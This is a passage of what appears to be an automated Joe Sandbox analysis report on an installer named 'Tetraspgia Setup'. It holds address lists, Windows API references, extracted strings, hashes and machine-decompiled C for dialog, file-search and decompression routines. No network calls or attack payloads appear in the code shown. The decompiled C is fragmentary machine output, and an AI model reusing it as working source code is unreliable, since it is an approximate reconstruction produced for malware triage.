						goto L52;
					}
				} else {
					E00406A3A(0x3fb, _t138);
					E00406D3D(_t138);
					L52:
					return E0040575B(_t135, _a12, _a16);
				}
			}

0x00404085
0x00404088
0x00404090
0x0040409a
0x004040a0
0x004040aa
0x004040c4
0x004040ca
0x00404146
0x0040414c
0x00404231
0x00404231
0x00404233
0x00404239
0x00404246
0x0040424c
0x00404250
0x00404256
0x0040425d
0x00404264
0x00404265
0x00404268
0x0040426c
0x00404270
0x00404276
0x0040427b
0x0040427f
0x00404281
0x004042d5
0x004042d7
0x004042dd
0x004042e2
0x004042e4
0x004042e6
0x004042e8
0x004042e8
0x00404300
0x00404306
0x00404308
0x00404343
0x00404347
0x0040434b
0x00000000
0x0040430a
0x0040431d
0x00404323
0x00404324
0x00404326
0x00404339
0x00404339
0x0040433d
0x0040434f
0x00404356
0x00404358
0x0040435a
0x0040436b
0x0040436b
0x0040436f
0x0040436f
0x00404374
0x00404378
0x0040437a
0x00404384
0x00404389
0x0040438b
0x004043b1
0x0040438d
0x0040438d
0x0040439c
0x0040439c
0x0040438b
0x004043b6
0x004043bc
0x004043be
0x004043c7
0x004043c7
0x004043cf
0x004043d0
0x004043d7
0x004043dc
0x004043e8
0x004043ee
0x004043f0
0x004043f2
0x004043f8
0x004043fa
0x004043fa
0x004043f8
0x004043ff
0x004043ff
0x00000000
0x004043ff
0x0040435c
0x0040435e
0x00000000
0x00000000
0x00404360
0x00404366
0x00404368
0x00000000
0x00404368
0x00404362
0x00404364
0x00000000
0x00000000
0x00000000
0x00404364
0x00404308
0x00404283
0x00404283
0x00404285
0x00404299
0x0040429b
0x0040429d
0x00000000
0x00000000
0x004042a3
0x004042a5
0x004042a7
0x004042a7
0x004042b4
0x004042b8
0x004042ba
0x004042bd
0x004042c0
0x004042c1
0x004042c4
0x004042c8
0x004042ce
0x00000000
0x004042d0
0x004042d0
0x00000000
0x004042d0
0x004042ce
0x0040432e
0x00404332
0x00404336
0x00404336
0x00000000
0x00404336
0x0040423b
0x00404240
0x00000000
0x00000000
0x00000000
0x00404240
0x00404152
0x00404156
0x00404159
0x0040415c
0x0040417b
0x00404180
0x00404183
0x00000000
0x00000000
0x0040418c
0x00404195
0x00404199
0x0040419d
0x004041a1
0x004041a9
0x004041b1
0x004041ba
0x004041be
0x004041c3
0x004041cb
0x004041d1
0x004041d3
0x00404171
0x00404171
0x00000000
0x00404171
0x004041d6
0x004041dd
0x004041e7
0x004041ed
0x004041ef
0x004041f1
0x004041f7
0x004041f9
0x004041fa
0x004041fb
0x0040420a
0x00404210
0x00404212
0x0040421a
0x0040421a
0x00404212
0x004041f7
0x0040421f
0x0040421f
0x0040422c
0x00000000
0x0040422c
0x00404168
0x0040416b
0x00000000
0x00000000
0x00000000
0x004040cc
0x004040cc
0x004040dd
0x004040df
0x004040e4
0x004040e6
0x004040e9
0x004040ee
0x004040f0
0x004040f3
0x004040f3
0x004040f0
0x004040fa
0x00404100
0x00404106
0x0040410a
0x0040410d
0x00404110
0x00404115
0x00404118
0x0040411b
0x00404121
0x00404128
0x0040412d
0x0040412f
0x00404138
0x00404138
0x00404406
0x00000000
0x00404407
0x004040ac
0x004040b2
0x004040b8
0x00404408
0x0040441b
0x0040441b

APIs

GetDlgItem.USER32(?,000003FB), ref: 004040D6
SetWindowTextW.USER32(00000000,?), ref: 00404100

Part of subcall function 00406A3A: GetDlgItemTextW.USER32(?,?,00000400,00404F4C), ref: 00406A4D

Part of subcall function 00406D3D: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,76A83420,004039C2), ref: 00406DB2
Part of subcall function 00406D3D: CharNextW.USER32(?,?,?,00000000), ref: 00406DC1
Part of subcall function 00406D3D: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,76A83420,004039C2), ref: 00406DC6
Part of subcall function 00406D3D: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,76A83420,004039C2), ref: 00406DDE

Strings

C:\Users\user\AppData\Local\Temp\mnstring, xrefs: 004041F1
user32::EnumWindows(i r1 ,i 0), xrefs: 0040409A
hB, xrefs: 0040425D
A, xrefs: 004041C3
Tetraspgia Setup: Installing, xrefs: 004041A1, 00404200
hB, xrefs: 004042C8
Call, xrefs: 00404205, 00404214
hB, xrefs: 004042D0

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: Char$Next$ItemText$PrevWindow
String ID: A$C:\Users\user\AppData\Local\Temp\mnstring$Call$Tetraspgia Setup: Installing$hB$hB$hB$user32::EnumWindows(i r1 ,i 0)
API String ID: 4089110348-3473560510
Opcode ID: 67f0241dfe840fb746c4c22d524f7960e15f62eb2687287e958e8c1ad4191570
Instruction ID: 78a62133d8830c36d5793369ed94498114b99b2b12e517e73a25645684f3fa2c
Opcode Fuzzy Hash: 67f0241dfe840fb746c4c22d524f7960e15f62eb2687287e958e8c1ad4191570
Instruction Fuzzy Hash: BD91BFB1704311ABD720AF658C81B6B76A8AF94744F41483EFB42B62D1D77CD9018BAE

Uniqueness

Uniqueness Score: -1.00%

Function 00402B75 Relevance: 1.5, APIs: 1, Instructions: 19
fileCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00402B75(void* __edi, void* __esi, struct _WIN32_FIND_DATAW _a136, void* _a172) {
				void* _v4;
				intOrPtr _t10;
				void* _t14;
				void* _t20;

				if(FindFirstFileW(E0040303E(_t14, 2),  &_a136) != 0xffffffff) {
					E0040661F(__esi, _t5);
					_push(_t20 + 0xb8);
					_push(__edi);
					E00406B1A();
					_t10 =  *((intOrPtr*)(_t20 + 0x10));
				} else {
					 *__esi = __ax;
					 *__edi = __ax;
					_t10 = 1;
				}
				 *0x435ac8 =  *0x435ac8 + _t10;
				return 0;
			}

0x00402b8e
0x00402b9c
0x00402b6e
0x00402b6f
0x00401d46
0x00402ea1
0x00402b90
0x00402b92
0x00402857
0x0040170b
0x0040170b
0x00402ea5
0x00402eb7

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 418b3747aa208848d22216286404bd5f33ecbcbc15520eeee9413542a938acf4
Instruction ID: 4ed41b4626080909459e48417ffb7120e43efe1e52fe46e4786edeb33a661726
Opcode Fuzzy Hash: 418b3747aa208848d22216286404bd5f33ecbcbc15520eeee9413542a938acf4
Instruction Fuzzy Hash: ADD0EC61414150A9D2606F71894DABA73ADAF45314F204A3EF156E50D1EAB85501973B

Uniqueness

Uniqueness Score: -1.00%

Function 004075FE Relevance: .4, Instructions: 410
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E004075FE(signed int* __ebx, signed int __edi, signed int __esi) {
				signed int _t447;
				signed int _t450;
				void* _t460;
				signed int _t461;
				signed int _t466;
				signed int _t467;
				void* _t469;
				signed int _t470;
				signed int _t475;
				signed int _t476;
				unsigned int _t505;
				void* _t513;
				signed int _t526;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t539;
				signed int _t544;
				signed int _t545;
				void* _t546;
				signed int _t547;
				unsigned int _t555;
				signed int _t559;
				signed int* _t567;
				signed int _t572;
				signed int _t574;
				signed int _t576;
				signed int _t595;
				void* _t602;
				signed int _t604;
				signed int _t607;
				signed char _t608;
				signed char* _t609;
				signed int _t611;
				signed int _t614;
				signed int _t615;
				void* _t616;
				unsigned int _t619;
				unsigned int _t625;
				signed int* _t629;
				signed char _t634;
				signed char _t635;
				signed char** _t637;
				void* _t638;
				signed int _t639;
				unsigned int _t644;
				signed int _t646;
				signed int _t647;
				unsigned int _t651;
				signed int _t652;
				void* _t657;

				L0:
				while(1) {
					L0:
					_t652 = __esi;
					_t647 = __edi;
					_t567 = __ebx;
					_t637 =  *(_t657 + 0x48);
					L56:
					while(_t652 < 0xe) {
						if(_t447 == 0) {
							L189:
							 *(_t657 + 0x1c) =  *(_t657 + 0x1c) & 0x00000000;
							_t567[0x147] = _t647;
							_t567[0x146] = _t652;
							_t637[1] = _t637[1] & 0x00000000;
							L196:
							 *_t637 =  *(_t657 + 0x14);
							_t567[0x26ea] =  *(_t657 + 0x18);
							L00407FBE(_t637);
							_t450 =  *(_t657 + 0x1c);
							L197:
							return _t450;
						}
						L55:
						 *(_t657 + 0x10) = _t447 - 1;
						_t647 = _t647 | ( *( *(_t657 + 0x14)) & 0x000000ff) << _t652;
						 *(_t657 + 0x14) =  &(( *(_t657 + 0x14))[1]);
						_t447 =  *(_t657 + 0x10);
						_t652 = _t652 + 8;
					}
					_t572 = _t647 & 0x00003fff;
					_t567[1] = _t572;
					if((_t572 & 0x0000001f) > 0x1d || (_t572 & 0x000003e0) > 0x3a0) {
						L186:
						_t567[0x146] = _t652;
						 *_t567 = 0x11;
						_t567[0x147] = _t647;
						_t637[1] =  *(_t657 + 0x10);
						goto L196;
					} else {
						L59:
						_t652 = _t652 - 0xe;
						_t647 = _t647 >> 0xe;
						_t567[2] = _t567[2] & 0x00000000;
						 *(_t657 + 0x20) = _t652;
						 *_t567 = 0xc;
						while(1) {
							L60:
							_t574 = _t567[2];
							_t637 =  *(_t657 + 0x48);
							L65:
							while(_t574 < (_t567[1] >> 0xa) + 4) {
								while(1) {
									L63:
									_t460 = 3;
									if(_t652 >= _t460) {
										break;
									}
									L61:
									_t461 =  *(_t657 + 0x10);
									if(_t461 == 0) {
										goto L189;
									}
									L62:
									 *(_t657 + 0x10) = _t461 - 1;
									_t647 = _t647 | ( *( *(_t657 + 0x14)) & 0x000000ff) << _t652;
									 *(_t657 + 0x14) =  &(( *(_t657 + 0x14))[1]);
									_t652 = _t652 + 8;
								}
								L64:
								_t466 = 7;
								_t576 = _t647;
								_t647 = _t647 >> 3;
								_t467 = _t567[2];
								_t96 = _t467 + 0x4099b0; // 0x121110
								 *(_t567 + 0xc +  *_t96 * 4) = _t576 & _t466;
								_t574 = _t567[2] + 1;
								_t469 = 3;
								_t652 = _t652 - _t469;
								_t567[2] = _t574;
								 *(_t657 + 0x20) = _t652;
							}
							_t638 = 0x13;
							if(_t574 >= _t638) {
								L68:
								_t470 = 7;
								 *(_t657 + 0x30) =  *(_t657 + 0x30) & 0x00000000;
								_t567[0x143] = _t470;
								_t475 = E00406EA8( &(_t567[3]), _t638, _t638, 0, 0,  &(_t567[0x144]),  &(_t567[0x143]),  &(_t567[0x148]), _t657 + 0x30);
								if(_t475 != 0 || _t567[0x143] == _t475) {
									L73:
									 *_t567 = 0x11;
									goto L22;
								} else {
									L70:
									_t567[2] = _t567[2] & _t475;
									 *_t567 = 0xd;
									L71:
									_t505 = _t567[1];
									_t637 =  *(_t657 + 0x48);
									 *(_t657 + 0x24) = _t505;
									if(_t567[2] >= (_t505 & 0x0000001f) + 0x102 + (_t505 >> 0x00000005 & 0x0000001f)) {
										L95:
										_t595 =  *(_t657 + 0x24);
										_t567[0x144] = _t567[0x144] & 0x00000000;
										 *(_t657 + 0x2c) =  *(_t657 + 0x2c) & 0x00000000;
										 *(_t657 + 0x30) = (_t595 & 0x0000001f) + 0x101;
										 *(_t657 + 0x2c) = 9;
										 *(_t657 + 0x28) = (_t595 >> 0x00000005 & 0x0000001f) + 1;
										 *(_t657 + 0x28) = 6;
										_t513 = E00406EA8( &(_t567[3]), (_t595 & 0x0000001f) + 0x101, 0x101, 0x4099c4, 0x409a04, _t657 + 0x48, _t657 + 0x30,  &(_t567[0x148]), _t657 + 0x2c);
										_t602 = 0xffffffff;
										_t476 =  ==  ? _t602 : _t513;
										if(_t476 != 0) {
											L187:
											_t637 =  *(_t657 + 0x48);
											L188:
											_t567[0x146] = _t652;
											_t567[0x147] = _t647;
											 *_t567 = 0x11;
											_t637[1] =  *(_t657 + 0x10);
											L195:
											 *(_t657 + 0x1c) = _t476 | 0xffffffff;
											goto L196;
										}
										L96:
										_t476 = E00406EA8( &(_t567[ *((intOrPtr*)(_t657 + 0x50)) + 3]),  *((intOrPtr*)(_t657 + 0x34)), 0, 0x409a44, 0x409a80, _t657 + 0x4c, _t657 + 0x28,  &(_t567[0x148]), _t657 + 0x2c);
										if(_t476 != 0) {
											goto L187;
										}
										L97:
										_t476 =  *(_t657 + 0x20);
										if(_t476 != 0 ||  *(_t657 + 0x30) <= 0x101) {
											L99:
											 *_t567 =  *_t567 & 0x00000000;
											_t567[4] = _t476;
											_t567[5] =  *(_t657 + 0x3c);
											_t567[4] =  *(_t657 + 0x28);
											_t567[6] =  *(_t657 + 0x40);
											L100:
											_t567[3] = _t567[4] & 0x000000ff;
											_t567[2] = _t567[5];
											_t526 =  *(_t657 + 0x10);
											 *_t567 = 1;
											L101:
											_t637 =  *(_t657 + 0x48);
											while(1) {
												L104:
												_t604 = _t567[3];
												if(_t652 >= _t604) {
													break;
												}
												L102:
												if(_t526 == 0) {
													goto L189;
												}
												L103:
												 *(_t657 + 0x10) = _t526 - 1;
												_t647 = _t647 | ( *( *(_t657 + 0x14)) & 0x000000ff) << _t652;
												 *(_t657 + 0x14) =  &(( *(_t657 + 0x14))[1]);
												_t526 =  *(_t657 + 0x10);
												_t652 = _t652 + 8;
											}
											L105:
											_t531 = _t567[2];
											_t607 =  *(0x40b0c0 + _t604 * 2) & 0x0000ffff & _t647;
											_t644 = _t531 + _t607 * 4;
											_t608 =  *(_t531 + 1 + _t607 * 4) & 0x000000ff;
											_t652 = _t652 - _t608;
											_t647 = _t647 >> _t608;
											_t609 = _t644;
											 *(_t657 + 0x30) = _t644;
											 *(_t657 + 0x20) = _t652;
											_t532 =  *_t609 & 0x000000ff;
											if(_t532 != 0) {
												L107:
												if((_t532 & 0x00000010) == 0) {
													L109:
													if((_t532 & 0x00000040) != 0) {
														L111:
														if((_t532 & 0x00000020) == 0) {
															L193:
															_t476 =  *(_t657 + 0x10);
															L194:
															_t637 =  *(_t657 + 0x48);
															 *_t567 = 0x11;
															_t567[0x147] = _t647;
															_t567[0x146] = _t652;
															_t637[1] = _t476;
															goto L195;
														}
														L112:
														_t533 = 7;
														 *_t567 = _t533;
														L22:
														L177:
														_t476 =  *(_t657 + 0x10);
														L178:
														_t639 = 0xf;
														L179:
														while( *_t567 <= _t639) {
															switch( *((intOrPtr*)( *_t567 * 4 +  &M00407F7E))) {
																case 0:
																	goto L100;
																case 1:
																	goto L101;
																case 2:
																	L113:
																	__edx =  *(__esp + 0x48);
																	while(1) {
																		L116:
																		__ecx = __ebx[2];
																		__eflags = __esi - __ecx;
																		if(__esi >= __ecx) {
																			break;
																		}
																		L114:
																		__eflags = __eax;
																		if(__eax == 0) {
																			goto L189;
																		}
																		L115:
																		__eax = __eax - 1;
																		__ecx = __esi;
																		 *(__esp + 0x10) = __eax;
																		 *(__esp + 0x14) =  *( *(__esp + 0x14)) & 0x000000ff;
																		__eax = ( *( *(__esp + 0x14)) & 0x000000ff) << __cl;
																		__edi = __edi | ( *( *(__esp + 0x14)) & 0x000000ff) << __cl;
																		 *(__esp + 0x14) =  *(__esp + 0x14) + 1;
																		__eax =  *(__esp + 0x10);
																		__esi = __esi + 8;
																		__eflags = __esi;
																	}
																	L117:
																	__eax =  *(0x40b0c0 + __ecx * 2) & 0x0000ffff;
																	__eax =  *(0x40b0c0 + __ecx * 2) & 0x0000ffff & __edi;
																	__edi = __edi >> __cl;
																	__ebx[1] = __ebx[1] + __eax;
																	__esi = __esi - __ecx;
																	__eflags = __esi;
																	__eax = __ebx[4] & 0x000000ff;
																	__ebx[3] = __ebx[4] & 0x000000ff;
																	__eax = __ebx[6];
																	__ebx[2] = __ebx[6];
																	_push(3);
																	_pop(__eax);
																	 *__ebx = __ebx[6];
																	__eax =  *(__esp + 0x10);
																	goto L118;
																case 3:
																	L118:
																	__edx =  *(__esp + 0x48);
																	while(1) {
																		L121:
																		__ecx = __ebx[3];
																		__eflags = __esi - __ecx;
																		if(__esi >= __ecx) {
																			break;
																		}
																		L119:
																		__eflags = __eax;
																		if(__eax == 0) {
																			goto L189;
																		}
																		L120:
																		__eax = __eax - 1;
																		__ecx = __esi;
																		 *(__esp + 0x10) = __eax;
																		 *(__esp + 0x14) =  *( *(__esp + 0x14)) & 0x000000ff;
																		__eax = ( *( *(__esp + 0x14)) & 0x000000ff) << __cl;
																		__edi = __edi | ( *( *(__esp + 0x14)) & 0x000000ff) << __cl;
																		 *(__esp + 0x14) =  *(__esp + 0x14) + 1;
																		__eax =  *(__esp + 0x10);
																		__esi = __esi + 8;
																		__eflags = __esi;
																	}
																	L122:
																	__ecx =  *(0x40b0c0 + __ecx * 2) & 0x0000ffff;
																	__eax = __ebx[2];
																	__eax = __ebx[2] + __ecx * 4;
																	__ecx =  *(__eax + 1) & 0x000000ff;
																	 *(__esp + 0x30) = __eax;
																	__esi = __esi - ( *(__eax + 1) & 0x000000ff);
																	__eax =  *__eax & 0x000000ff;
																	__edi = __edi >> __cl;
																	 *(__esp + 0x20) = __esi;
																	__eflags = __al & 0x00000010;
																	if((__al & 0x00000010) == 0) {
																		L124:
																		__eflags = __al & 0x00000040;
																		if((__al & 0x00000040) != 0) {
																			goto L193;
																		}
																		L125:
																		__ecx =  *(__esp + 0x30);
																		goto L110;
																	}
																	L123:
																	_push(0xf);
																	_pop(__ecx);
																	__eax = __eax & __ecx;
																	__ecx =  *(__esp + 0x30);
																	__ebx[2] = __eax;
																	__eax =  *(__ecx + 2) & 0x0000ffff;
																	__ebx[3] = __eax;
																	 *__ebx = 4;
																	goto L22;
																case 4:
																	L126:
																	__edx =  *(__esp + 0x48);
																	while(1) {
																		L129:
																		__ecx = __ebx[2];
																		__eflags = __esi - __ecx;
																		if(__esi >= __ecx) {
																			break;
																		}
																		L127:
																		__eflags = __eax;
																		if(__eax == 0) {
																			goto L189;
																		}
																		L128:
																		__eax = __eax - 1;
																		__ecx = __esi;
																		 *(__esp + 0x10) = __eax;
																		 *(__esp + 0x14) =  *( *(__esp + 0x14)) & 0x000000ff;
																		__eax = ( *( *(__esp + 0x14)) & 0x000000ff) << __cl;
																		__edi = __edi | ( *( *(__esp + 0x14)) & 0x000000ff) << __cl;
																		 *(__esp + 0x14) =  *(__esp + 0x14) + 1;
																		__eax =  *(__esp + 0x10);
																		__esi = __esi + 8;
																		__eflags = __esi;
																	}
																	L130:
																	__eax =  *(0x40b0c0 + __ecx * 2) & 0x0000ffff;
																	__eax =  *(0x40b0c0 + __ecx * 2) & 0x0000ffff & __edi;
																	__edi = __edi >> __cl;
																	__ebx[3] = __ebx[3] + __eax;
																	__esi = __esi - __ecx;
																	__eflags = __esi;
																	__ecx =  *(__esp + 0x18);
																	 *(__esp + 0x20) = __esi;
																	 *__ebx = 5;
																	goto L131;
																case 5:
																	L131:
																	__edx =  *(__esp + 0x48);
																	__ecx = __ecx - __ebx;
																	__eax = __ecx - __ebx - 0x1ba0;
																	__eflags = __ecx - __ebx - 0x1ba0 - __ebx[3];
																	if(__ecx - __ebx - 0x1ba0 >= __ebx[3]) {
																		__eax = __ecx;
																		__eax = __ecx - __ebx[3];
																		__eflags = __eax;
																	} else {
																		__ebx[0x26e8] = __ebx[0x26e8] - __ebx[3];
																		__ebx[0x26e8] - __ebx[3] - __ebx = __ebx[0x26e8] - __ebx[3] - __ebx + 0xffffe460;
																		__eax = __ebx[0x26e8] - __ebx[3] - __ebx + 0xffffe460 + __ecx;
																	}
																	__eflags = __ebx[1];
																	 *(__esp + 0x24) = __eax;
																	if(__ebx[1] != 0) {
																		do {
																			L135:
																			__eflags = __ebp;
																			if(__ebp != 0) {
																				goto L151;
																			}
																			L136:
																			__eflags = __ecx - __ebx[0x26e8];
																			if(__ecx != __ebx[0x26e8]) {
																				L142:
																				__ebx[0x26ea] = __ecx;
																				L00407FBE(__edx);
																				__ecx = __ebx[0x26ea];
																				__eax = __ebx[0x26e9];
																				__edx =  *(__esp + 0x48);
																				 *(__esp + 0x18) = __ecx;
																				__eflags = __ecx - __eax;
																				if(__ecx >= __eax) {
																					__eax = __ebx[0x26e8];
																					__ebp = __eax;
																					__ebp = __eax - __ecx;
																					__eflags = __ebp;
																				} else {
																					__ebp = __eax;
																					__eax =  *(__edx + 0x9bb0);
																					__ebp = __ebp - __ecx;
																					__ebp = __ebp - 1;
																				}
																				 *(__esp + 0x30) = __eax;
																				__eflags = __ecx - __eax;
																				if(__ecx == __eax) {
																					__eax =  &(__ebx[0x6e8]);
																					__eflags = __ebx[0x26e9] - __eax;
																					if(__ebx[0x26e9] != __eax) {
																						__ebp = __ebx[0x26e9];
																						__ecx = __eax;
																						 *(__esp + 0x18) = __ecx;
																						__eflags = __eax - __ebp;
																						if(__eax >= __ebp) {
																							__ebp =  *(__esp + 0x30);
																							__ebp =  *(__esp + 0x30) - __eax;
																							__eflags = __ebp;
																						} else {
																							__ebp = __ebp - __eax;
																							__ebp = __ebp - 1;
																						}
																					}
																				}
																				__eflags = __ebp;
																				if(__ebp == 0) {
																					goto L192;
																				} else {
																					goto L151;
																				}
																			}
																			L137:
																			__ebp = __ebx[0x26e9];
																			__eax =  &(__ebx[0x6e8]);
																			__eflags = __ebp - __eax;
																			if(__eflags == 0) {
																				goto L142;
																			}
																			L138:
																			__ecx = __eax;
																			if(__eflags <= 0) {
																				__ebp = __ebx[0x26e8];
																				__ebp = __ebx[0x26e8] - __eax;
																				__eflags = __ebp;
																			} else {
																				__ebp = __ebp - __eax;
																				__ebp = __ebp - 1;
																			}
																			__eflags = __ebp;
																			if(__ebp == 0) {
																				goto L142;
																			}
																			L151:
																			__eax =  *(__esp + 0x24);
																			__al =  *( *(__esp + 0x24));
																			 *__ecx = __al;
																			__ecx = __ecx + 1;
																			__eax =  *(__esp + 0x24);
																			__eax =  *(__esp + 0x24) + 1;
																			 *(__esp + 0x18) = __ecx;
																			__ebp = __ebp - 1;
																			 *(__esp + 0x24) = __eax;
																			__eflags = __eax - __ebx[0x26e8];
																			if(__eax == __ebx[0x26e8]) {
																				__eax =  &(__ebx[0x6e8]);
																				 *(__esp + 0x24) = __eax;
																			}
																			_t356 =  &(__ebx[1]);
																			 *_t356 = __ebx[1] - 1;
																			__eflags =  *_t356;
																		} while ( *_t356 != 0);
																	}
																	goto L154;
																case 6:
																	L155:
																	__edx =  *(__esp + 0x48);
																	__eflags = __ebp;
																	if(__ebp != 0) {
																		L171:
																		__al = __ebx[2];
																		 *__ecx = __al;
																		__ecx = __ecx + 1;
																		 *(__esp + 0x18) = __ecx;
																		__ebp = __ebp - 1;
																		L154:
																		 *__ebx =  *__ebx & 0x00000000;
																		goto L177;
																	}
																	L156:
																	__eflags = __ecx - __ebx[0x26e8];
																	if(__ecx != __ebx[0x26e8]) {
																		L162:
																		__ebx[0x26ea] = __ecx;
																		L00407FBE(__edx);
																		__ecx = __ebx[0x26ea];
																		__eax = __ebx[0x26e9];
																		__edx =  *(__esp + 0x48);
																		 *(__esp + 0x18) = __ecx;
																		__eflags = __ecx - __eax;
																		if(__ecx >= __eax) {
																			__eax = __ebx[0x26e8];
																			__ebp = __eax;
																			__ebp = __eax - __ecx;
																			__eflags = __ebp;
																		} else {
																			__ebp = __eax;
																			__eax =  *(__edx + 0x9bb0);
																			__ebp = __ebp - __ecx;
																			__ebp = __ebp - 1;
																		}
																		 *(__esp + 0x30) = __eax;
																		__eflags = __ecx - __eax;
																		if(__ecx == __eax) {
																			__eax =  &(__ebx[0x6e8]);
																			__eflags = __ebx[0x26e9] - __eax;
																			if(__ebx[0x26e9] != __eax) {
																				__ebp = __ebx[0x26e9];
																				__ecx = __eax;
																				 *(__esp + 0x18) = __ecx;
																				__eflags = __eax - __ebp;
																				if(__eax >= __ebp) {
																					__ebp =  *(__esp + 0x30);
																					__ebp =  *(__esp + 0x30) - __eax;
																					__eflags = __ebp;
																				} else {
																					__ebp = __ebp - __eax;
																					__ebp = __ebp - 1;
																				}
																			}
																		}
																		__eflags = __ebp;
																		if(__ebp == 0) {
																			goto L192;
																		} else {
																			goto L171;
																		}
																	}
																	L157:
																	__ebp = __ebx[0x26e9];
																	__eax =  &(__ebx[0x6e8]);
																	__eflags = __ebp - __eax;
																	if(__eflags == 0) {
																		goto L162;
																	}
																	L158:
																	__ecx = __eax;
																	if(__eflags <= 0) {
																		__ebp = __ebx[0x26e8];
																		__ebp = __ebx[0x26e8] - __eax;
																		__eflags = __ebp;
																	} else {
																		__ebp = __ebp - __eax;
																		__ebp = __ebp - 1;
																	}
																	__eflags = __ebp;
																	if(__ebp != 0) {
																		goto L171;
																	} else {
																		goto L162;
																	}
																case 7:
																	L172:
																	_push(7);
																	_pop(__ebp);
																	__eflags = __esi - __ebp;
																	if(__esi > __ebp) {
																		__esi = __esi - 8;
																		__eax = __eax + 1;
																		_t378 = __esp + 0x14;
																		 *_t378 =  *(__esp + 0x14) - 1;
																		__eflags =  *_t378;
																		 *(__esp + 0x20) = __esi;
																		 *(__esp + 0x10) = __eax;
																	}
																	goto L174;
																case 8:
																	L2:
																	_t641 =  *(_t657 + 0x48);
																	__eflags = _t652 - 3;
																	if(_t652 >= 3) {
																		L7:
																		_t652 = _t652 + 0xfffffffd;
																		_t478 = _t647 & 0x00000007;
																		_t647 = _t647 >> 3;
																		 *(_t657 + 0x30) = _t478;
																		__eflags = _t478 & 0x00000001;
																		_push("true");
																		_pop(_t479);
																		_t480 =  !=  ?  *((void*)(_t657 + 0x34)) : _t479;
																		_t567[0x145] =  !=  ?  *((void*)(_t657 + 0x34)) : _t479;
																		 *(_t657 + 0x2c) = _t647;
																		 *(_t657 + 0x20) = _t652;
																		_t483 =  *(_t657 + 0x30) >> 1;
																		__eflags = _t483;
																		if(_t483 == 0) {
																			L23:
																			_push(7);
																			 *_t567 = 9;
																			_pop(_t484);
																			_t647 = _t647 >> (_t652 & _t484);
																			_t652 = _t652 & 0xfffffff8;
																			 *(_t657 + 0x20) = _t652;
																			goto L22;
																		}
																		L8:
																		_t485 = _t483 - 1;
																		__eflags = _t485;
																		if(_t485 == 0) {
																			L13:
																			__eflags =  *0x432810;
																			if( *0x432810 != 0) {
																				L21:
																				_t486 =  *0x40b0e4; // 0x9
																				_t567[4] = _t486;
																				_t487 =  *0x40b0e8; // 0x5
																				_t567[4] = _t487;
																				_t488 =  *0x433098; // 0x0
																				_t567[5] = _t488;
																				_t489 =  *0x43309c; // 0x0
																				 *_t567 =  *_t567 & 0x00000000;
																				__eflags =  *_t567;
																				_t567[6] = _t489;
																				goto L22;
																			} else {
																				 *(_t657 + 0x28) =  *(_t657 + 0x28) & 0x00000000;
																				_t490 = 0;
																				__eflags = 0;
																				_push(7);
																				_pop(_t569);
																				do {
																					L15:
																					_push("true");
																					_pop(_t583);
																					__eflags = _t490 - 0x8f;
																					if(_t490 > 0x8f) {
																						__eflags = _t490 - 0x100;
																						if(_t490 >= 0x100) {
																							_push("true");
